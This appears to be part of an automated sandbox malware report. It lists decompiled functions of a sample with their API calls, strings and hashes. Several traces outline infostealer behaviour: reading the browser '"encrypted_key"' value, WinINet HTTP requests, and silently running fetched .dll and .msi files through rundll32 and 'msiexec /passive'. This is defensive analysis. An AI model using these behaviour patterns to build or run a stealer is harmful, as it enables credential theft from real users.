Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
String ID:
API String ID: 2206442479-0
Opcode ID: 3eed7c8b0298ade49de783b97f8103c59495be1610462d0a48e51c192460f2e1
Instruction ID: 9b8953e07197604a31493b0d65dd3307c99482accd72b78eb2f8161ceeed3414
Opcode Fuzzy Hash: 3eed7c8b0298ade49de783b97f8103c59495be1610462d0a48e51c192460f2e1
Instruction Fuzzy Hash: EE516C71604705DFC704DF65C484A9ABBF4FF8A358F108A2EE95A87710DB30B945CB99

Function 009317A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,block), ref: 009317C5
ExitProcess.KERNEL32 ref: 009317D1

Strings

block, xrefs: 009317B7

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: block
API String ID: 621844428-2199623458
Opcode ID: edd32c6c5a9d1239827c9619441f90a75144870e9cb00cc56bc3016c8025972a
Instruction ID: 36d82eb2245f24f0ebb3dcdaa814d128deea6043a50cfa5edcf2ad5e0d52101d
Opcode Fuzzy Hash: edd32c6c5a9d1239827c9619441f90a75144870e9cb00cc56bc3016c8025972a
Instruction Fuzzy Hash: 8C5149B4A04209EFCB04DFA4E994FBE77BAAF84704F108448E506A73A1D774E955CF62

Function 00932E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON

Download Yara Rule

APIs

Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788

ShellExecuteEx.SHELL32(0000003C), ref: 009331C5
ShellExecuteEx.SHELL32(0000003C), ref: 0093335D
ShellExecuteEx.SHELL32(0000003C), ref: 009334EA

Strings

.msi, xrefs: 00933398
"" , xrefs: 0093309A
<, xrefs: 00933490
/passive, xrefs: 0093345B
.dll, xrefs: 009331E5
C:\Windows\system32\msiexec.exe, xrefs: 009334BF
/i ", xrefs: 009333E4
C:\Windows\system32\rundll32.exe, xrefs: 00933332

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: ExecuteShell$lstrcpy
String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
API String ID: 2507796910-3625054190
Opcode ID: d1b42699d8f51ef21dcea3a64c0f304a8ae78552dab8ec250fe72a8f68b28814
Instruction ID: e64ea95f77d809104f4d141f13c1adf7088fd9774d0fe27398c153fd97e7c13e
Opcode Fuzzy Hash: d1b42699d8f51ef21dcea3a64c0f304a8ae78552dab8ec250fe72a8f68b28814
Instruction Fuzzy Hash: 15120D71810108AADB19FBA0DC92FEEB778AF94300F504169F54776191EF742B4ACFA6

Function 6C69EC70 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C664A68), ref: 6C69945E
Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C699470
Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C699482
Part of subcall function 6C699420: __Init_thread_footer.LIBCMT ref: 6C69949F

GetCurrentThreadId.KERNEL32 ref: 6C69EC84
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C69EC8C

Part of subcall function 6C6994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6994EE
Part of subcall function 6C6994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C699508

GetCurrentThreadId.KERNEL32 ref: 6C69ECA1
AcquireSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69ECAE
?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6C69ECC5
ReleaseSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69ED0A
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C69ED19
CloseHandle.KERNEL32(?), ref: 6C69ED28
free.MOZGLUE(00000000), ref: 6C69ED2F
ReleaseSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69ED59

Strings

[I %d/%d] profiler_ensure_started, xrefs: 6C69EC94

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
String ID: [I %d/%d] profiler_ensure_started
API String ID: 4057186437-125001283
Opcode ID: 6f752f8e038e371429242f7d7bed7329dc5222a32dc293cb44beca4bad8acc52
Instruction ID: 2ae2e6adba9c6c1c82c3a60dad5285ffbeb87b2139405902274e78f0153f2d9b
Opcode Fuzzy Hash: 6f752f8e038e371429242f7d7bed7329dc5222a32dc293cb44beca4bad8acc52
Instruction Fuzzy Hash: 1C21E575600106AFDF009F26DC44A9A3779FF8636DF144210FD1897745DB31A80ACBAE

Function 6C67C570 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 277stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C67C5A3
WideCharToMultiByte.KERNEL32 ref: 6C67C9EA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C67C9FB
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C67CA12
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C67CA2E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C67CAA5

Strings

0, xrefs: 6C67D30A
(null), xrefs: 6C67C596

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ByteCharMultiWidestrlen$freemalloc
String ID: (null)$0
API String ID: 4074790623-38302674
Opcode ID: 946298515b47d45dbfcc8824a1bb1790f2a17144965091408ef7e48c0c2a008b
Instruction ID: ec663ae348d2d7e35e63457b47664be838fc7f850928f8c79191e0fbf81cf5c1
Opcode Fuzzy Hash: 946298515b47d45dbfcc8824a1bb1790f2a17144965091408ef7e48c0c2a008b
Instruction Fuzzy Hash: 2AA1B230608341AFDB20DF29C59475EBBE1AFC9758F048D2DE99AD3641D731E805CB6A

Function 009352C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0093A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0093A7E6

Part of subcall function 00926280: InternetOpenA.WININET(00940DFE,00000001,00000000,00000000,00000000), ref: 009262E1
Part of subcall function 00926280: StrCmpCA.SHLWAPI(?,006FE9D8), ref: 00926303
Part of subcall function 00926280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00926335
Part of subcall function 00926280: HttpOpenRequestA.WININET(00000000,GET,?,006FE400,00000000,00000000,00400100,00000000), ref: 00926385
Part of subcall function 00926280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009263BF
Part of subcall function 00926280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009263D1

Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00935318
lstrlen.KERNEL32(00000000), ref: 0093532F

Part of subcall function 00938E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00938E52

StrStrA.SHLWAPI(00000000,00000000), ref: 00935364
lstrlen.KERNEL32(00000000), ref: 00935383
lstrlen.KERNEL32(00000000), ref: 009353AE

Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788

Strings

ERROR, xrefs: 0093546F
ERROR, xrefs: 009354A9
ERROR, xrefs: 00935432
ERROR, xrefs: 009353B9
ERROR, xrefs: 0093530A

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
String ID: ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 3240024479-1526165396
Opcode ID: 36cff979d845b0e32ef50e95f603b2467a2c97cd50cbf7431fc35206d92d4e06
Instruction ID: 81c1517bfec557146044df2d0dd08a1e0d10936ad4e3395e16b8872d9a5a6660
Opcode Fuzzy Hash: 36cff979d845b0e32ef50e95f603b2467a2c97cd50cbf7431fc35206d92d4e06
Instruction Fuzzy Hash: 2E51D970910148ABCB18FF60D996FEE7779AF94300F504018F446AB592EF346B46DFA6

Function 6C653480 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 86librarytimeloaderCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C653492
GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C6534A9
LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C6534EF
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6C65350E
__Init_thread_footer.LIBCMT ref: 6C653522
__aulldiv.LIBCMT ref: 6C653552
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C65357C
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C653592

Part of subcall function 6C68AB89: EnterCriticalSection.KERNEL32(6C6DE370,?,?,?,6C6534DE,6C6DF6CC,?,?,?,?,?,?,?,6C653284), ref: 6C68AB94
Part of subcall function 6C68AB89: LeaveCriticalSection.KERNEL32(6C6DE370,?,6C6534DE,6C6DF6CC,?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C68ABD1

Strings

kernel32.dll, xrefs: 6C6534EA
GetSystemTimePreciseAsFileTime, xrefs: 6C653508

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
API String ID: 3634367004-706389432
Opcode ID: e061da427ccfffe8b3b9444bf5cfb6c200ce120e6d9a646ebd6fae84dc35615d
Instruction ID: 9855ab1f5cf0ff1ab9f91fc4aabf033d94efc2b8b54de8244a30b0250912f382
Opcode Fuzzy Hash: e061da427ccfffe8b3b9444bf5cfb6c200ce120e6d9a646ebd6fae84dc35615d
Instruction Fuzzy Hash: 5631B371B012469BDF00DFBAC888AAA77B5FB86745F204429F50193A64DB70B905CF69

Function 6C654480 Relevance: 16.8, APIs: 11, Instructions: 316COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(B60B60B8,?,?,?,?,6C694843,?), ref: 6C6545F5
free.MOZGLUE(?,?,?,?,?,?,?,?,6C694843,?), ref: 6C65468A
free.MOZGLUE(?,?,?,?,?,?,6C694843,?), ref: 6C6546C9
free.MOZGLUE(?), ref: 6C6546EF
free.MOZGLUE(?), ref: 6C654712
free.MOZGLUE(?), ref: 6C654735
free.MOZGLUE(?), ref: 6C654758
free.MOZGLUE(?), ref: 6C65477B
free.MOZGLUE(?), ref: 6C65479E

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: free$moz_xmalloc
String ID:
API String ID: 3009372454-0
Opcode ID: 42e0285ff12e1b48db14d9e7b7756cdd3e21479a2d910f018ee96b5da21308c6
Instruction ID: 5853785377ad7fac109c5e2629cf6a5aa9a57433c8303e5361673e4d80730685
Opcode Fuzzy Hash: 42e0285ff12e1b48db14d9e7b7756cdd3e21479a2d910f018ee96b5da21308c6
Instruction Fuzzy Hash: E5B1F671A001518FDB188E3CC8D07BD77A1AF42328FA846A9E416DBBC6D7B1D8748B59

Function 00934280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00938DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00938E0B

lstrcat.KERNEL32(?,00000000), ref: 009342EC
lstrcat.KERNEL32(?,006FE190), ref: 0093430B
lstrcat.KERNEL32(?,?), ref: 0093431F
lstrcat.KERNEL32(?,006FD318), ref: 00934333

Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788

Part of subcall function 00938D90: GetFileAttributesA.KERNEL32(00000000,?,00921B54,?,?,0094564C,?,?,00940E1F), ref: 00938D9F

Part of subcall function 00929CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00929D39

Part of subcall function 009299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009299EC
Part of subcall function 009299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00929A11
Part of subcall function 009299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00929A31
Part of subcall function 009299C0: ReadFile.KERNEL32(000000FF,?,00000000,0092148F,00000000), ref: 00929A5A
Part of subcall function 009299C0: LocalFree.KERNEL32(0092148F), ref: 00929A90
Part of subcall function 009299C0: CloseHandle.KERNEL32(000000FF), ref: 00929A9A

Part of subcall function 009393C0: GlobalAlloc.KERNEL32(00000000,009343DD,009343DD), ref: 009393D3

StrStrA.SHLWAPI(?,006FDF50), ref: 009343F3
GlobalFree.KERNEL32(?), ref: 00934512

Part of subcall function 00929AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00924EEE,00000000,00000000), ref: 00929AEF
Part of subcall function 00929AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00924EEE,00000000,?), ref: 00929B01
Part of subcall function 00929AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00924EEE,00000000,00000000), ref: 00929B2A
Part of subcall function 00929AC0: LocalFree.KERNEL32(?,?,?,?,00924EEE,00000000,?), ref: 00929B3F

lstrcat.KERNEL32(?,00000000), ref: 009344A3
StrCmpCA.SHLWAPI(?,009408D1), ref: 009344C0
lstrcat.KERNEL32(00000000,00000000), ref: 009344D2
lstrcat.KERNEL32(00000000,?), ref: 009344E5
lstrcat.KERNEL32(00000000,00940FB8), ref: 009344F4

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
String ID:
API String ID: 3541710228-0
Opcode ID: 4d53365e90a9f27fd86f321f1b462aaffe097ec67ca26fcde08a4467e61acf6b
Instruction ID: f99c4f00208493505afd92b908651068e6d8e8a24b5a8ff7b9a1157171f39d3e
Opcode Fuzzy Hash: 4d53365e90a9f27fd86f321f1b462aaffe097ec67ca26fcde08a4467e61acf6b
Instruction Fuzzy Hash: 657123B6900218ABDF14EBA0EC95FEE737DAB88300F044598F605A7181EE75EB55CF91

Function 6C6BAC20 Relevance: 16.6, APIs: 11, Instructions: 92fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 6C6BAC52
CreateFileMappingW.KERNEL32 ref: 6C6BAC7D
GetSystemInfo.KERNEL32 ref: 6C6BAC98
MapViewOfFile.KERNEL32 ref: 6C6BACB0
GetSystemInfo.KERNEL32 ref: 6C6BACCD
MapViewOfFile.KERNEL32 ref: 6C6BAD05
